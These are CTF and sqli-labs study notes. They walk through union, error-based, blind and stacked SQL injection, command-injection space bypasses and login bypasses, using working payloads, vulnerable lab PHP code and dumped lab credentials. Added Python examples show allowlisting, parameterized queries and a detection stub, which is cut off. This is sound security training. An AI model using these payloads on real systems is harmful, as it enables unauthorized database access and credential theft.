CTF knowledge points

1. [HCTF 2018] WarmUp

PHP code audit
Reading a PHP file through the address bar (file inclusion)
PHP study
Downloading, installing and using WampServer
Reaching the flag file that sits several directory levels away

2. [极客大挑战 2019] Havefun

Knowledge point: GET requests in PHP

3. [极客大挑战 2019] PHP

Download and unpack the directory brute-forcing tool dirsearch, then install Python 3 or later, pip and pip3 with the usual series of commands, upgrade pip3, and sort out the proxy permission problem. After finding a series of files, since the hint is about a backup,
use the common backup file names and extensions; with those two pieces of information, write Python code that walks the candidate URLs until it finds the matching archive.
Download and open the archive: index.php points, via its hint, to class.php.
Read the class.php code, find the key information, then serialize, then unserialize, deal with the magic-method problem, and finally get the flag.

4. [GXYCTF2019] Ping Ping Ping

IP address basics
DOS commands
ls: list directory contents
cat: concatenate files and print them to standard output
Reading the PHP code
Ways to bypass the space filter:
cat flag.txt
cat$IFSflag.txt    cat${IFS}flag.txt    cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
Variable-concatenation trick
Regular expressions
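As an added example (not part of the original notes), the defender's side of the Ping Ping Ping lesson in Python: a filter that only blocks the space character lets every $IFS and redirection form listed above through, while an address allowlist plus an argv list with no shell leaves them nothing to work with. The sample inputs are constructed here.

```python
import ipaddress
import subprocess

# Constructed sample inputs: one real address, then the same address followed by
# a command separator and each space-free form from the notes above.
SAMPLE_INPUTS = [
    "127.0.0.1",
    "127.0.0.1;cat$IFSflag.txt",
    "127.0.0.1;cat${IFS}flag.txt",
    "127.0.0.1;cat$IFS$9flag.txt",
    "127.0.0.1;cat<flag.txt",
]


def denylist_check(value):
    """Challenge-style filter: block the literal space character and nothing else.
    $IFS, ${IFS} and < contain no space, so every sample input passes."""
    return " " not in value


def allowlist_check(value):
    """Accept only a syntactically valid IPv4/IPv6 address; reject everything else."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def build_ping_argv(value):
    """Validate, then return ping's argv. The address is one argv element and is
    never part of a shell command line, so ; and $IFS have no special meaning."""
    if not allowlist_check(value):
        raise ValueError("refusing to ping: not an IP address")
    return ["ping", "-c", "1", value]


def run_ping(value, timeout=5):
    # shell=False (the default): no shell ever parses the argument list.
    proc = subprocess.run(build_ping_argv(value), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode, proc.stdout
```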

5. [极客大挑战 2019] EasySQL1

Login SQL statement: select * from admin where username = '<user-supplied username>' and password = '<user-supplied password>'
The user controls what is submitted, so the username can be, for example, ' or 1 = 1 -- (with a trailing space)
The SQL then becomes: select * from admin where username = '' or 1=1 -- ' and password = '<user-supplied password>'
Here or 1=1 is always true and -- comments out everything after it, so the statement returns every row of the admin table.
Capture the request to find the universal password (first work out which back-end language is in use, then settle on the universal password).

6. [极客大挑战 2019] HardSQL

Error-based injection
1'or(updatexml(1,concat(0x7e,database(),0x7e),1))or'
Database: geek
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))or'
Table: H4rDsq1
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))or'
Columns: id,username,password
1'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,100)))from(geek.H4rDsq1)),0x7e),1))or'
flag

9-590c-45da-bfef-90828a1dc70e}

7. BUU SQL COURSE 1

Test with Firefox F12, find the suspicious file, and open http://a27afc80-fc2d-45b7-bcea-90d52c0850be.node4.buuoj.cn:81/backend/content_detail.php?id=1
Detect: and 1 = 1; and 1 = 2; 1'
Count columns: 1 order by 2
Display positions: id = 0 union select 1,2 (both positions are displayed)
Dump databases:
id=0 union select 1,group_concat(schema_name) from (information_schema.schemata)
information_schema,ctftraining,mysql,performance_schema,test,news
id=0 union select 1,database()
news
Dump tables:
id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,contents
Dump columns:
id=0 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin'
id,username,password
Dump values:
0 union select 1,group_concat(id,username,password) from (admin)
1 admin 4a581b825861c72e390fa6fbc1aa2063

8. [Chapter 1: Web Basics] SQL Injection - 1

Detect
and 1 = 1; and 1 = 2; no error, so string type
# does not work, --+ does
Count columns
id=1' order by 3 --+
id=1' order by 4 --+
Display positions:
id=0' union select 1,2,3--+
2 and 3 are display positions
Dump databases:
id=0' union select 1,2,database()--+
note
id=0' union select 1,2,group_concat(schema_name) from (information_schema.schemata)--+
information_schema,mysql,note,performance_schema
Dump tables:
id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
fl4g,notes
Dump columns:
id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+
fllllag
id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='notes'
id,title,content
Dump values:
0' union select 1,2,group_concat(fllllag) from (fl4g)
n1book

9. [Chapter 1: Web Basics] SQL Injection - 2

Following the hint, go to login.php
The page source hints that adding ?tips=1 makes the page show error messages
Union injection does not seem to work, so try error-based injection, capturing the request with Burp
Dump database:
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
1' and extractvalue(1,concat(0x7e,database(),0x7e)) #
note
Dump tables:
1' and updatexml(1,concat(0x7e,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
select is filtered, so it is bypassed by double-writing it (seselectlect)
fl4g,users
Dump columns:
1' and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_schema=database()),0x7e),1) #
flag,id,username,passwd
1' and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1) #
flag
1' and updatexml(1,concat(0x7e,(seselectlect group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #
id,username,passwd
Dump values:
1' and updatexml(1,concat(0x7e,(seselectlect group_concat(flag) from (fl4g)),0x7e),1) #
n1book

10. RedTiger's Hackit Level1

Level1 Simple SQL-Injection
Viewing the source reveals cat=1; click through to it
Injection point found
Detect:
and 1 = 1; and 1 = 2; 1';
numeric injection
Count columns:
?cat=1 order by 4--+
?cat=1 order by 5--+
4 columns
Display positions:
?cat=1 union select 1,2,3,4--+
3 and 4 are displayed
Dump database:
?cat=1 union select 1,2,3,database()--+
hackit
Dump tables:
?cat=1 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--+
nothing is displayed
the challenge hints at level1_users
Dump columns:
?cat=1 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='level1_users'--+
no result either; better to keep it simple
usually there are username and password columns
Dump values:
?cat=1 union select 1,2,username,password from level1_users--+
Hornoxe
thatwaseasy

11. RedTiger's Hackit Level2

Universal password
1' or 1 = 1
1' or 1 = 1

12. RedTiger's Hackit Level3

13. sqli-labs-master/Less-1

String type; union, error-based, boolean, time-based

  1. Detect
    ?id=1 and 1 = 1--+
    ?id=1 and 1 = 2--+
    ?id=1' and 1 = 1--+
    ?id=1' and 1 = 2--+
    string type
  2. Count columns
    ?id=1' order by 3--+
    ?id=1' order by 4--+
    3 columns
  3. Display positions
    ?id=0' union select 1,2,3--+
    2 and 3 are displayed
  4. Dump databases
    0' union select 1,2,group_concat(schema_name) from (information_schema.schemata)--+
  5. Dump tables
    0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
  6. Dump columns
  7. Dump values

14. sqli-labs-master/Less-2

Numeric type; union, error-based, boolean, time-based

  1. Detect
    1 and 1': numeric type

  2. Count columns
    id=1 order by 3--+
    id=1 order by 4--+
    3 columns

  3. Display positions
    id=0 union select 1,2,3--+
    positions 2 and 3 are displayed
    so union injection works and 2 and 3 are display positions

  4. Dump databases
    id=0 union select 1,2,group_concat(schema_name) from (information_schema.schemata)--+
    all databases: information_schema,challenges,mysql,performance_schema,pikachu,security,sys
    id=0 union select 1,2,database()--+
    current database: security

  5. Dump tables
    id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
    security database: emails,referers,uagents,users

  6. Dump columns
    id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
    users table of the security database: id,username,password

  7. Dump values
    id=0 union select 1,2,group_concat(concat_ws(username,password)) from (users)--+
    username and password columns of the users table: Angelina,I-kill-you

  8. Code

<?php
// sqli-labs Less-2 (PHP 5 mysql extension, as shipped by the lab). The opening
// lines below were restored so the braces balance; the lab's include is assumed
// to have opened the database connection already.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// Injection point: $id is interpolated unquoted, so anything after a number is parsed as SQL.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());   // raw MySQL error text reaches the page: this is what error-based injection reads
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}

?>
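An added example, not code from sqli-labs or the EasySQL challenge, using Python's sqlite3 module as a stand-in for MySQL: the login query from the EasySQL section and the unquoted id query from Less-2 above, each in its string-spliced form beside its parameterized form, seeded with the Dumb/Angelina rows the notes dumped.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the lab's users table, seeded with rows from the notes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
    """)
    return conn


def login_vulnerable(conn, username, password):
    # Same shape as the EasySQL login query: user input spliced into the SQL text,
    # so a quote closes the string and -- comments out the password check.
    sql = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    # Placeholders: the values travel separately from the SQL text, so quotes
    # and comment markers inside them stay data and match nothing.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def lookup_vulnerable(conn, id_value):
    # Less-2 shape: the id is interpolated unquoted, so a trailing UNION rides in.
    sql = f"SELECT * FROM users WHERE id={id_value} LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, id_value):
    # Enforce the type the lab's own message asks for ("numeric value"), then bind it.
    try:
        id_int = int(id_value)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_int,)).fetchone()
```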

15. sqli-labs-master/Less-3

String type; union, error-based, boolean, time-based

  1. Detect
    id=1')--+
    injection wrapped in ')

  2. Count columns
    id=1') order by 3--+
    id=1') order by 4--+
    3 columns

  3. Display positions
    id=0') union select 1,2,3--+
    2 and 3 are echoed back

  4. Dump databases
    id=0') union select 1,2,group_concat(schema_name) from (information_schema.schemata)--+
    all databases: information_schema,challenges,mysql,performance_schema,pikachu,security,sys
    id=0') union select 1,2,database()--+
    current database: security

  5. Dump tables
    id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
    security database: emails,referers,uagents,users

  6. Dump columns
    id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
    users table of the security database: id,username,password

  7. Dump values
    id=0') union select 1,2,group_concat(concat_ws(username,password)) from (users)--+
    username and password columns of the users table: Angelina,I-kill-you

  8. Code

<?php
// sqli-labs Less-3 (PHP 5 mysql extension). Opening lines restored so the braces
// balance; the lab's include is assumed to have opened the connection.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// Injection point: $id sits inside ('...'), so input must close both the quote and the parenthesis.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());   // raw MySQL error text is echoed
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

16. sqli-labs-master/Less-4

String type; union, error-based, boolean, time-based

  1. Detect
    id=1")--+
    double-quote injection

  2. Count columns
    id=1") order by 3--+
    id=1") order by 4--+
    3 columns

  3. Display positions
    id=0") union select 1,2,3--+
    2 and 3 are echoed back

  4. Dump databases
    id=0") union select 1,2,group_concat(schema_name) from (information_schema.schemata)--+
    all databases: information_schema,challenges,mysql,performance_schema,pikachu,security,sys
    id=0") union select 1,2,database()--+
    current database: security

  5. Dump tables
    id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
    security database: emails,referers,uagents,users

  6. Dump columns
    id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
    users table of the security database: id,username,password

  7. Dump values
    id=0") union select 1,2,group_concat(concat_ws(username,password)) from (users)--+
    username and password columns of the users table: Angelina,I-kill-you

  8. Code

<?php
// sqli-labs Less-4 (PHP 5 mysql extension). Opening lines restored so the braces
// balance; the lab's include is assumed to have opened the connection.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// The id is wrapped in double quotes and then placed inside parentheses: ("...").
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());   // raw MySQL error text is echoed
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

17. sqli-labs-master/Less-5

String type; error-based, boolean, time-based (', %')

  1. Detect
    A series of tests gave nothing obvious; error-based injection succeeded, and probing with sqlmap showed error-based, boolean-blind and time-blind injection
  2. Dump database (explained with error-based injection)
    1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
    1' and extractvalue(1,concat(0x7e,database(),0x7e))--+
    current database: security
  3. Dump tables
    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
    security database: emails,referers,uagents,users
  4. Dump columns
    1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x7e),1)--+
    security database: id,email_id,id,referer,ip_addre

    1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
    USER,CURRENT_CONNECTIONS,TOTAL
    not fully dumped; blind injection is advisable, and left()/right() do not seem to work here
    1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='表名' limit 0,1),0x7e),1) --+
    (表名 stands for the table name) just keep changing the limit range
    this turns up username and password
  5. Dump values
    1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from (security.users)),0x7e),1)--+
    DumbDumb,AngelinaI-kill-you,Dum
    likewise, keep changing limit to get the full contents

  6. Code
<?php
// sqli-labs Less-5 (PHP 5 mysql extension). Opening lines restored so the braces
// balance; the lab's include is assumed to have opened the connection.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// Injection point: single-quoted string context.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
// No column values are printed, so union injection has no display position.
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());   // the error text is still echoed, which is why error-based injection works
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

mysql_error() returns the text of the error message produced by the previous MySQL operation.

18. sqli-labs-master/Less-6

String type; error-based, boolean, time-based (", '")

  1. Detect
    A series of tests gave nothing obvious; error-based injection succeeded, and probing with sqlmap showed error-based, boolean-blind and time-blind injection
    Slight difference: the earlier error-based and blind injections used a single quote, here it is a double quote

  2. Dump database (explained with error-based injection)
    1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
    1" and extractvalue(1,concat(0x7e,database(),0x7e))--+
    current database: security

  3. Dump tables
    1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
    security database: emails,referers,uagents,users

  4. Dump columns
    1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
    USER,CURRENT_CONNECTIONS,TOTAL
    not fully dumped; blind injection is advisable, and left()/right() do not seem to work here
    1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='表名' limit 0,1),0x7e),1) --+
    (表名 stands for the table name) just keep changing the limit range
    this turns up username and password

  5. Dump values
    1" and updatexml(1,concat(0x7e,(select group_concat(username,password) from (security.users)),0x7e),1)--+
    DumbDumb,AngelinaI-kill-you,Dum
    likewise, keep changing limit to get the full contents

  6. Code

<?php
// sqli-labs Less-6 (PHP 5 mysql extension). Opening lines restored so the braces
// balance; the lab's include is assumed to have opened the connection.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// The id is wrapped in double quotes before interpolation: double-quoted string context.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color= "#FFFF00">';
print_r(mysql_error());   // the error text is echoed: error-based injection is possible
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

19. sqli-labs-master/Less-7

String type; boolean, time-based

  1. Detect
    Run sqlmap: boolean and time-based blind injection

  2. Blind injection
    Since it is blind, either work by hand or run sqlmap or a script. By hand is tedious, so here I simply run sqlmap.

  3. Code

<?php
// sqli-labs Less-7 (PHP 5 mysql extension). Opening lines restored so the braces
// balance; the lab's include is assumed to have opened the connection.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// Injection point: the id sits inside (('...')).
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// A fixed message replaces the real error: the page still reveals success vs failure, but no error text.
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

mysql_error() is commented out, so neither error-based nor union injection is possible.

20. sqli-labs-master/Less-8

String type; boolean, time-based (', %')

  1. Detect
    Run sqlmap: boolean or time-based blind injection

  2. Code

    <?php
    // sqli-labs Less-8 (PHP 5 mysql extension). Opening lines restored so the braces
    // balance; the lab's include is assumed to have opened the connection.
    if(isset($_GET['id']))
    {
    $id=$_GET['id'];
    // Injection point: single-quoted string context.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
    }
    else
    {
    // Nothing is printed on failure, neither data nor error text; only the presence
    // or absence of "You are in" leaks, hence boolean-blind (or time-blind) only.
    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';

    }
    }
    else { echo "Please input the ID as parameter with numeric value";}
    ?>

21. sqli-labs-master/Less-9

String type; boolean, time-based (', %')

  1. Detect
    boolean and time-based blind injection
  2. Code
<?php
// sqli-labs Less-9 (PHP 5 mysql extension). Opening lines restored so the braces
// balance; the lab's include is assumed to have opened the connection.
if(isset($_GET['id']))
{
$id=$_GET['id'];
// Injection point: single-quoted string context.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
// Both branches print the same text, so the response content carries no signal
// at all; only response timing remains, hence time-based blind injection.
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

22. sqli-labs-master/Less-10 (sqlmap did not find it!!!)

String type; boolean, time-based (", '")
Time-based blind injection done by hand
The blind injection uses a double quote

  • Code

    <?php
    // sqli-labs Less-10 (PHP 5 mysql extension). Opening lines restored so the braces
    // balance; the lab's include is assumed to have opened the connection.
    if(isset($_GET['id']))
    {
    $id=$_GET['id'];
    // The id is wrapped in double quotes before interpolation.
    $id = '"'.$id.'"';
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
    }
    else
    {
    // Same output on success and failure: only timing can be observed.
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';

    }
    }
    else { echo "Please input the ID as parameter with numeric value";}
    ?>

23. sqli-labs-master/Less-11

String type; union, error-based, boolean, time-based

  1. First, it is a POST request; second, the universal password works. From this a general rule emerges:
    in a URL use --+ as the comment, in POST injection use #

  2. Looking at the source, string-type union injection and error-based injection both work

  3. sqlmap did not find anything

  4. Detect
    test with 1 and 1': string type

  5. Count columns
    1' order by 2 #
    1' order by 3 #
    2 columns

  6. Display positions
    1' union select 1,2 #
    positions 1 and 2 are displayed

  7. Dump databases
    1' union select 1,group_concat(schema_name) from (information_schema.schemata) #

  8. Dump tables
    1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

  9. Dump columns

  10. Dump values

  11. Code

    <?php
    // sqli-labs Less-11 (PHP 5 mysql extension): POST login form. The opening lines
    // were restored so the braces balance; the lab's include is assumed to have
    // opened the database connection.
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    // Injection point: both fields are spliced into single-quoted string context.
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    //echo '<font color= "#0000ff">';

    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in\n\n " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    echo 'Your Login name:'. $row['username'];   // column values are echoed: display positions for union injection
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';

    echo "</font>";
    }
    else
    {
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    print_r(mysql_error());   // raw MySQL error text is echoed
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
    }
    }
    ?>

24. sqli-labs-master/Less-12

String type; union, error-based, boolean, time-based
Same approach as the previous level, only the wrapper becomes ")

  • Code

    <?php
    // sqli-labs Less-12 (PHP 5 mysql extension): POST login form. The opening lines
    // were restored so the braces balance; the lab's include is assumed to have
    // opened the database connection.
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    // Both fields are wrapped in double quotes and placed inside parentheses: ("...").
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    //echo '<font color= "#0000ff">';

    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';

    echo "</font>";
    }
    else
    {
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    print_r(mysql_error());   // raw MySQL error text is echoed
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
    }
    }
    ?>

25. sqli-labs-master/Less-13 (sqlmap boolean did not find it!!!)

String type; error-based, boolean, time-based
Well, still similar, only the wrapper becomes ')

  • Code

    <?php
    // sqli-labs Less-13 (PHP 5 mysql extension): POST login form. The opening lines
    // were restored so the braces balance; the lab's include is assumed to have
    // opened the database connection.
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    // Injection point: both fields sit inside ('...').
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    //echo '<font color= "#0000ff">';

    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    // Column values are no longer echoed, so union injection has no display position.
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';

    echo "</font>";
    }
    else
    {
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    print_r(mysql_error());   // the error text is still echoed: error-based injection remains
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
    }
    }
    ?>

26. sqli-labs-master/Less-14 (sqlmap boolean did not find it!!!)

String type; error-based, boolean, time-based
Looking at the source, only error-based injection is possible; the wrapper is "

  • Code

    <?php
    // sqli-labs Less-14 (PHP 5 mysql extension): POST login form. The opening lines
    // were restored so the braces balance; the lab's include is assumed to have
    // opened the database connection.
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    // Both fields are wrapped in double quotes before interpolation.
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
    //echo '<font color= "#0000ff">';

    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    // Column values are not echoed: no display position for union injection.
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';

    echo "</font>";
    }
    else
    {
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    print_r(mysql_error());   // the error text is echoed: error-based injection remains
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
    }
    }
    ?>

27. sqli-labs-master/Less-15 (sqlmap boolean did not find it!!!)

String type; boolean, time-based

28. sqli-labs-master/Less-16 (sqlmap boolean and time-based did not find it!!!)

String type; boolean, time-based
wrapper: ")

29. sqli-labs-master/Less-17

String type; boolean, time-based

30. [强网杯 2019] 随便注 (Inject Casually)

  1. Detect the type
    1 or 1 = 1 #
    1' or 1 = 1 #
    string type
  2. Count columns
    1' order by 2 #
    1' order by 3 #
    3 columns
  3. Union injection?
    0' union select 1,2 #
    returns: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
    so these keywords are filtered and union injection does not seem feasible
  4. Stacked injection
    Dump databases: 0';show databases;#
    Dump tables: 0';show tables;#
    Dump columns: 0';show columns from words;#
    0';show columns from `1919810931114514`;#
    Why the backticks? Because when a purely numeric name is used as a column, table or database name in a query, it has to be wrapped in backticks; entering it this way returns the result
  5. Dump values
    PREPARE sqla from '[my sql sequence]';  define a prepared SQL statement
    EXECUTE sqla;  execute the prepared statement
    (DEALLOCATE || DROP) PREPARE sqla;  drop the prepared statement
    Passing the statement through a variable:
    SET @tn = 'flag';  store the table name
    PREPARE sqla from @sql;  define the prepared statement
    EXECUTE sqla;  execute the prepared statement
    (DEALLOCATE || DROP) PREPARE sqla;  drop the prepared statement
    PREPARE prepares a SQL statement and assigns it a name under which it can be called later.
    The prepared statement is run with EXECUTE and released with DEALLOCATE PREPARE.

In this challenge, char() converts ASCII codes into the string SELECT, concat() joins it into the query SQL, and executing that gives the result. The payload:

1';SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514` ");PREPARE sqla from @sql;EXECUTE sqla;
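Turning the payload families in these notes (ORDER BY probing, UNION reads of information_schema, the updatexml()/extractvalue() error-based reads of Less-5 and the SQL Injection - 2 write-up, the double-written seselectlect, and the stacked SHOW/PREPARE queries with char()-encoded SELECT above) into detection logic: an added Python example, not from any challenge or tool, run over constructed Apache-style access log lines. Rule names and the log lines are assumptions made here.

```python
import re
from urllib.parse import unquote_plus

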